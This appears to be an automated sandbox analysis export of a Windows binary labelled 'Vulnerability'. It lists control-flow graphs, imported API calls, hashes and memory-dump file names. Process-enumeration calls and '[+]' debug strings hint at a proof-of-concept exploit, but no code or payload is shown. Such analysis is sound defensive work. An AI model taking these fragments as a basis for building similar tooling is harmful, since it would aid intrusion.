                                                    control_flow_graph 595 7ff7738e1330-7ff7738e1385 596 7ff7738e139d-7ff7738e13bd malloc 595->596 597 7ff7738e1387 595->597 599 7ff7738e13c3-7ff7738e13eb memmove 596->599 600 7ff7738e1a57-7ff7738e1a69 596->600 598 7ff7738e1390-7ff7738e139b 597->598 598->596 598->598 601 7ff7738e1404-7ff7738e145b 599->601 602 7ff7738e13ed-7ff7738e13ff memset 599->602 603 7ff7738e19c0-7ff7738e1a52 free 601->603 604 7ff7738e1461 601->604 602->601 603->600 605 7ff7738e1464-7ff7738e172c 604->605 606 7ff7738e1730-7ff7738e1734 605->606 607 7ff7738e1736-7ff7738e1749 606->607 608 7ff7738e174b-7ff7738e1752 606->608 609 7ff7738e1798-7ff7738e17c8 607->609 610 7ff7738e1754-7ff7738e176d 608->610 611 7ff7738e176f-7ff7738e1773 608->611 615 7ff7738e17dc-7ff7738e17e2 609->615 616 7ff7738e17ca-7ff7738e17da 609->616 612 7ff7738e1795 610->612 613 7ff7738e1775-7ff7738e1786 611->613 614 7ff7738e1788-7ff7738e1791 611->614 612->609 613->612 614->612 618 7ff7738e17e4-7ff7738e17fc 615->618 619 7ff7738e17fe-7ff7738e1801 615->619 617 7ff7738e1826-7ff7738e184d 616->617 620 7ff7738e1863-7ff7738e1869 617->620 621 7ff7738e184f-7ff7738e1861 617->621 622 7ff7738e1823 618->622 623 7ff7738e1813-7ff7738e1820 619->623 624 7ff7738e1803-7ff7738e1811 619->624 626 7ff7738e1881-7ff7738e1884 620->626 627 7ff7738e186b-7ff7738e187f 620->627 625 7ff7738e18ac-7ff7738e18d9 621->625 622->617 623->622 624->622 631 7ff7738e18db-7ff7738e18ec 625->631 632 7ff7738e18ee-7ff7738e18f4 625->632 629 7ff7738e1886-7ff7738e1897 626->629 630 7ff7738e1899-7ff7738e18a6 626->630 628 7ff7738e18a9 627->628 628->625 629->628 630->628 633 7ff7738e1931-7ff7738e1961 631->633 634 7ff7738e18f6-7ff7738e1907 632->634 635 7ff7738e1909-7ff7738e190c 632->635 633->606 636 7ff7738e1967-7ff7738e19aa 633->636 637 7ff7738e192e 634->637 638 7ff7738e191e-7ff7738e192b 635->638 639 7ff7738e190e-7ff7738e191c 635->639 636->605 640 7ff7738e19b0-7ff7738e19b8 636->640 637->633 638->637 639->637 640->603
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: freemallocmemmovememset
                                                    • String ID:
                                                    • API String ID: 1050734653-0
                                                    • Opcode ID: b571248dc4445a9d52385899018f1781bfa6bd60c9789f80331ab341d92d0fa1
                                                    • Instruction ID: 7a7db40049bd34fe92e3f56a556679a2ce67030ed07fc19f6e7ba7273636bfa2
                                                    • Opcode Fuzzy Hash: b571248dc4445a9d52385899018f1781bfa6bd60c9789f80331ab341d92d0fa1
                                                    • Instruction Fuzzy Hash: EF122DA3A2C1E04AD7BD972D54B463D7FE0E385345B48526EDB9793682D93CC224DB30

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 464 7ff7738ea3c0-7ff7738ea3ef 465 7ff7738ea3f0-7ff7738ea3f8 464->465 465->465 466 7ff7738ea3fa-7ff7738ea409 465->466 467 7ff7738ea415 466->467 468 7ff7738ea40b-7ff7738ea40e 466->468 470 7ff7738ea417-7ff7738ea427 467->470 468->467 469 7ff7738ea410-7ff7738ea413 468->469 469->470 471 7ff7738ea430-7ff7738ea442 ?good@ios_base@std@@QEBA_NXZ 470->471 472 7ff7738ea429-7ff7738ea42f 470->472 473 7ff7738ea474-7ff7738ea47a 471->473 474 7ff7738ea444-7ff7738ea453 471->474 472->471 478 7ff7738ea486-7ff7738ea49f 473->478 479 7ff7738ea47c-7ff7738ea481 473->479 476 7ff7738ea455-7ff7738ea458 474->476 477 7ff7738ea472 474->477 476->477 480 7ff7738ea45a-7ff7738ea470 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 476->480 477->473 482 7ff7738ea4a1-7ff7738ea4a4 478->482 483 7ff7738ea4cf-7ff7738ea4ea ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 478->483 481 7ff7738ea53e-7ff7738ea55c ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 479->481 480->473 486 7ff7738ea55e-7ff7738ea567 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 481->486 487 7ff7738ea568-7ff7738ea578 481->487 482->483 488 7ff7738ea4a6-7ff7738ea4c1 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 482->488 484 7ff7738ea4ec 483->484 485 7ff7738ea517 483->485 489 7ff7738ea4f0-7ff7738ea4f3 484->489 490 7ff7738ea51a 485->490 486->487 491 7ff7738ea581-7ff7738ea59b 487->491 492 7ff7738ea57a-7ff7738ea580 487->492 493 7ff7738ea4c3-7ff7738ea4c8 488->493 494 7ff7738ea4ca-7ff7738ea4cd 488->494 495 7ff7738ea4f5-7ff7738ea510 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 489->495 496 7ff7738ea51e-7ff7738ea52e 489->496 490->496 492->491 493->490 494->482 495->485 497 7ff7738ea512-7ff7738ea515 495->497 496->481 497->489
                                                    APIs
                                                    • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
                                                    • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
                                                    • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
                                                    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7
                                                    • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7738EA4E1
                                                    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA506
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
                                                    • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_D@std@@@std@@U?$char_traits@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                    • String ID:
                                                    • API String ID: 1082002092-0
                                                    • Opcode ID: ef2d79dececa04f2a13e11419a62dfe81de786ebe0591a841e3a6f70c526b580
                                                    • Instruction ID: 215dff7e3061af52057168afc31480b3af2956bd337b76088739ca4e38eea83f
                                                    • Opcode Fuzzy Hash: ef2d79dececa04f2a13e11419a62dfe81de786ebe0591a841e3a6f70c526b580
                                                    • Instruction Fuzzy Hash: 6551A433668A8181EBA09F19E484238E7A0FF94F95F95C631CE5E577A0CF3ED5528320

                                                    Control-flow Graph

                                                    APIs
                                                    • GetShellWindow.USER32 ref: 00007FF7738F15AB
                                                    • GetWindowThreadProcessId.USER32 ref: 00007FF7738F15B9
                                                      • Part of subcall function 00007FF7738F14C0: GetCurrentProcessId.KERNEL32 ref: 00007FF7738F14E6
                                                      • Part of subcall function 00007FF7738F14C0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7738F14F3
                                                      • Part of subcall function 00007FF7738F14C0: memset.VCRUNTIME140 ref: 00007FF7738F1514
                                                      • Part of subcall function 00007FF7738F14C0: Process32FirstW.KERNEL32 ref: 00007FF7738F1529
                                                      • Part of subcall function 00007FF7738F14C0: Process32NextW.KERNEL32 ref: 00007FF7738F1541
                                                      • Part of subcall function 00007FF7738F14C0: CloseHandle.KERNEL32 ref: 00007FF7738F155A
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
                                                      • Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
                                                      • Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
                                                      • Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
                                                      • Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F15E7
                                                      • Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F160A
                                                    • ?get@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F1617
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: D@std@@@std@@U?$char_traits@V01@$U?$char_traits@_W@std@@@std@@$??6?$basic_ostream@?good@ios_base@std@@ProcessProcess32V01@@Window$?flush@?$basic_ostream@_?get@?$basic_istream@?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@CloseCreateCurrentFirstHandleNextOsfx@?$basic_ostream@_ShellSnapshotThreadToolhelp32V12@memset
                                                    • String ID: [+] Pausing to allow for debugging$[+] Press enter to close
                                                    • API String ID: 3552510059-3552938800
                                                    • Opcode ID: db1304cfada4e5d369478eac87371c6066fc7352a77a55c4ea3d84e5fcdb4119
                                                    • Instruction ID: 0c7bf9408b89d08cab27147c2ecbed4620ae5965b49692a83168fcfebb25d77d
                                                    • Opcode Fuzzy Hash: db1304cfada4e5d369478eac87371c6066fc7352a77a55c4ea3d84e5fcdb4119
                                                    • Instruction Fuzzy Hash: CA01ED66E38A0381EA90BB11E855079E370BFA4B84FC01231D84D67265DF3EE225C730

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: __p___argc__p___wargv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_wide_environment_register_thread_local_exe_atexit_callback
                                                    • String ID:
                                                    • API String ID: 1876865454-0
                                                    • Opcode ID: 81a9dc358cc5445206e6b3113a70518158365fa1dd99ecfb0ae8e3a6ee9012e8
                                                    • Instruction ID: 75f633584ad588cb7c5f3b31e355ad83d116424f58029442c5ed171e71379370
                                                    • Opcode Fuzzy Hash: 81a9dc358cc5445206e6b3113a70518158365fa1dd99ecfb0ae8e3a6ee9012e8
                                                    • Instruction Fuzzy Hash: 83316E23A3C16342FA90BB649411BB9D290AF65784FCC4136E60D672E3DE3FE4648230

                                                    Control-flow Graph

                                                    APIs
                                                    • ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF7738EA1AA
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738EA1C7
                                                    • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7738EA1F0
                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA23B
                                                      • Part of subcall function 00007FF7738EC7A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7CD
                                                      • Part of subcall function 00007FF7738EC7A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7E7
                                                      • Part of subcall function 00007FF7738EC7A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC819
                                                      • Part of subcall function 00007FF7738EC7A0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC844
                                                      • Part of subcall function 00007FF7738EC7A0: std::_Facet_Register.LIBCPMT ref: 00007FF7738EC85D
                                                      • Part of subcall function 00007FF7738EC7A0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC87C
                                                    • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA250
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738EA267
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                    • String ID:
                                                    • API String ID: 3911317180-0
                                                    • Opcode ID: ced2ee0d270a0d08c7756cd4170fd5b4ef679d07e97a5ad8cc40a74c96589590
                                                    • Instruction ID: ac67a7bc4c59d730a20aa975d0c09904d43588e00f1afa8032bbe720b9fd4bb4
                                                    • Opcode Fuzzy Hash: ced2ee0d270a0d08c7756cd4170fd5b4ef679d07e97a5ad8cc40a74c96589590
                                                    • Instruction Fuzzy Hash: E4315032629B4281EB909F25E844329B3E4FB88F88F440235DE8D67758DF3ED464C760

                                                    Control-flow Graph

                                                    APIs
                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E97CC
                                                    • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738E97EB
                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E981D
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738E9838
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E9883
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
                                                    • String ID:
                                                    • API String ID: 1184074665-0
                                                    • Opcode ID: a4d82ed9e96bca0c89e0db1e4963b752a7366df0eb9c30eb4c8adf4af5c11ac6
                                                    • Instruction ID: 40a4b22bda75f49d2484bf722ae3fa9322cfcd0b26b7ea8747945af072adf3e1
                                                    • Opcode Fuzzy Hash: a4d82ed9e96bca0c89e0db1e4963b752a7366df0eb9c30eb4c8adf4af5c11ac6
                                                    • Instruction Fuzzy Hash: 3E31AA33725B8286EB509F25EA94729B7A0FB85F89F848231CA4D53714CF3ED069C760

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e7c404c1a1bba81196f57576af691f4329f7fd379a4ccbe15ce8d1330266ce23
                                                    • Instruction ID: 841c3752b2495ac1b46fd47925473b9bb48e3ebd6afed6eee40e859567905f18
                                                    • Opcode Fuzzy Hash: e7c404c1a1bba81196f57576af691f4329f7fd379a4ccbe15ce8d1330266ce23
                                                    • Instruction Fuzzy Hash: 57317223B64A8286EEA5AF25E4043B9E361FB44BD4F884135CF4D57750DE7DE4A5C320

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Initialize_configthreadlocale_initialize_onexit_table_initialize_wide_environment
                                                    • String ID:
                                                    • API String ID: 2955177221-0
                                                    • Opcode ID: 43b1fc390244c3511705dfa8a3e9e35ad4ae1c78bbaf5e80ff61b34d442b4d0f
                                                    • Instruction ID: f6c7965ad150fb98bead34ba7935065b14fa83d3331688991dcb71fbef35f41a
                                                    • Opcode Fuzzy Hash: 43b1fc390244c3511705dfa8a3e9e35ad4ae1c78bbaf5e80ff61b34d442b4d0f
                                                    • Instruction Fuzzy Hash: 83115823E3816346FAD876B15456AB8D2818FB4314FCD0436E62DA72C3ED7FA8754632

                                                    Control-flow Graph

                                                    APIs
                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738F4138
                                                      • Part of subcall function 00007FF7738F4B1C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7738F4B25
                                                      • Part of subcall function 00007FF7738F4B1C: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF7738F413D,?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43), ref: 00007FF7738F4B36
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738F413E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
                                                    • String ID:
                                                    • API String ID: 594857686-0
                                                    • Opcode ID: b18d63560ee7327d8c0214411c38715cb7d7ef8b47e8810f596ac4ad894b71ec
                                                    • Instruction ID: e4f4aa47bfefbc971523ae18f2fe5345522be28e221ea3a1a25ab7fb7e7d2969
                                                    • Opcode Fuzzy Hash: b18d63560ee7327d8c0214411c38715cb7d7ef8b47e8810f596ac4ad894b71ec
                                                    • Instruction Fuzzy Hash: 02E0E603E7912755FDE831622405875C0440F74371E9C1732DA7D262C7AD3EA5B14130

                                                    Control-flow Graph

                                                    APIs
                                                    • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7738EA5B5
                                                    • ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z.MSVCP140 ref: 00007FF7738EA5C1
                                                    • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA5CA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?put@?$basic_ostream@_?widen@?$basic_ios@_V12@V12@_
                                                    • String ID:
                                                    • API String ID: 2094784882-0
                                                    • Opcode ID: 26560ff4dc348fa32aa4d0b96a9c05765b84153fff5ca5dbd198ed44ddb469cd
                                                    • Instruction ID: efbab56f127df0cb43f8df66819f72b1c6e042d8a5d4c0b0232ac8560057f432
                                                    • Opcode Fuzzy Hash: 26560ff4dc348fa32aa4d0b96a9c05765b84153fff5ca5dbd198ed44ddb469cd
                                                    • Instruction Fuzzy Hash: 27D01215A6471B81DA486F16B85413493109F99F91F485030CD0F47310CE3DD0A58334

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 725 7ff7738e8db0-7ff7738e8de1 726 7ff7738e8df3-7ff7738e8dfb 725->726 727 7ff7738e8de3-7ff7738e8de7 725->727 728 7ff7738e8e86-7ff7738e8e97 726->728 729 7ff7738e8e01-7ff7738e8e08 call 7ff7738e9e00 726->729 727->726 730 7ff7738e8de9-7ff7738e8dee 727->730 732 7ff7738e8e9b-7ff7738e8eb5 call 7ff7738f3fc0 728->732 729->728 736 7ff7738e8e0a-7ff7738e8e0d 729->736 730->726 733 7ff7738e8df0 730->733 733->726 738 7ff7738e8e14-7ff7738e8e29 _fseeki64 736->738 739 7ff7738e8e0f-7ff7738e8e12 736->739 738->728 740 7ff7738e8e2b-7ff7738e8e3f fgetpos 738->740 739->738 739->740 740->728 741 7ff7738e8e41-7ff7738e8e48 740->741 742 7ff7738e8e6c-7ff7738e8e84 741->742 743 7ff7738e8e4a-7ff7738e8e69 741->743 742->732 743->742
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: _fseeki64fgetpos
                                                    • String ID:
                                                    • API String ID: 3401907645-0
                                                    • Opcode ID: b83ac07ecf1b7c532eeed7c3122e0da24c9e69cfce4552c536ea2858b50140ec
                                                    • Instruction ID: ac046bd4e8afc11b4f44b7900224d3e6c6e5066032d51f0859435873404dc81b
